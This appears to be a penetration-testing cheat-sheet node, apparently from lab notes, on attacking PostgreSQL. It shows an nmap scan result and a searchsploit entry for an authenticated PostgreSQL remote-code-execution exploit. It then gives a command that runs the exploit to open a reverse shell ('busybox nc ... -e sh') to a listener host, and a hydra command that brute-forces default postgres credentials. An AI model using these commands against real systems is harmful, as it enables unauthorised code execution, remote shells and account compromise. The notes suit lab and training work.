x

PostgreSQL (5432)

RCE

5437/tcp open  postgresql PostgreSQL DB 11.3 - 11.9
| ssl-cert: Subject: commonName=debian
| Subject Alternative Name: DNS:debian
| Not valid before: 2020-04-27T15:41:47
|_Not valid after:  2030-04-25T15:41:47

Searchsploit RCE

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)
multiple/remote/50847.py
python3 50847.py -i 192.168.214.47 -p 5437 -c "busybox nc 192.168.45.191 80 -e sh"

Bruteforcing

Use a combination pair

hydra -C SecLists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt 192.168.207.183 postgres
Left-click: follow link, Right-click: select node, Scroll: zoom
x